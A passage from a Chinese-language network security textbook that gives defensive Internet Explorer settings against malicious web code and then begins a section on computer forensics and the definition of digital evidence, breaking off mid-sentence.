IE瀏覽器中Internet選項(xiàng)的安全級(jí)別，把安全級(jí)別由“中”改為“高”。4）鑒于某些惡意代碼調(diào)用ActiveXComponent類，可以對“C:WindowsJavaPackages”文件夾中含有ActiveXComponent.class類的ZIP文件重命名，還可以直接把Java文件夾重命名。5）如果己經(jīng)知道某些網(wǎng)站具有惡意代碼，可以在IE的Internet選項(xiàng)中啟用分級(jí)審查，在許可站點(diǎn)標(biāo)簽中輸入不想訪問的網(wǎng)址，以便永不進(jìn)入這些具有惡意代碼的網(wǎng)站。6.4 網(wǎng)絡(luò)攻擊取證與安全審計(jì)6.4.1 計(jì)算機(jī)取證技術(shù)1.數(shù)字證據(jù)的概念（1）數(shù)字證據(jù)的定義數(shù)字證據(jù)也稱為計(jì)算機(jī)證據(jù)。計(jì)算機(jī)證據(jù)國際組織（International Organization on Computer Evidence，IOCE）給出的與數(shù)字證據(jù)相關(guān)的定義為：1）數(shù)字證據(jù)：法庭上可能成為證據(jù)的以二進(jìn)制形式存儲(chǔ)或傳送的信息。2）原始數(shù)字證據(jù)：查封計(jì)算機(jī)犯罪現(xiàn)場時(shí)，相關(guān)物理介質(zhì)及其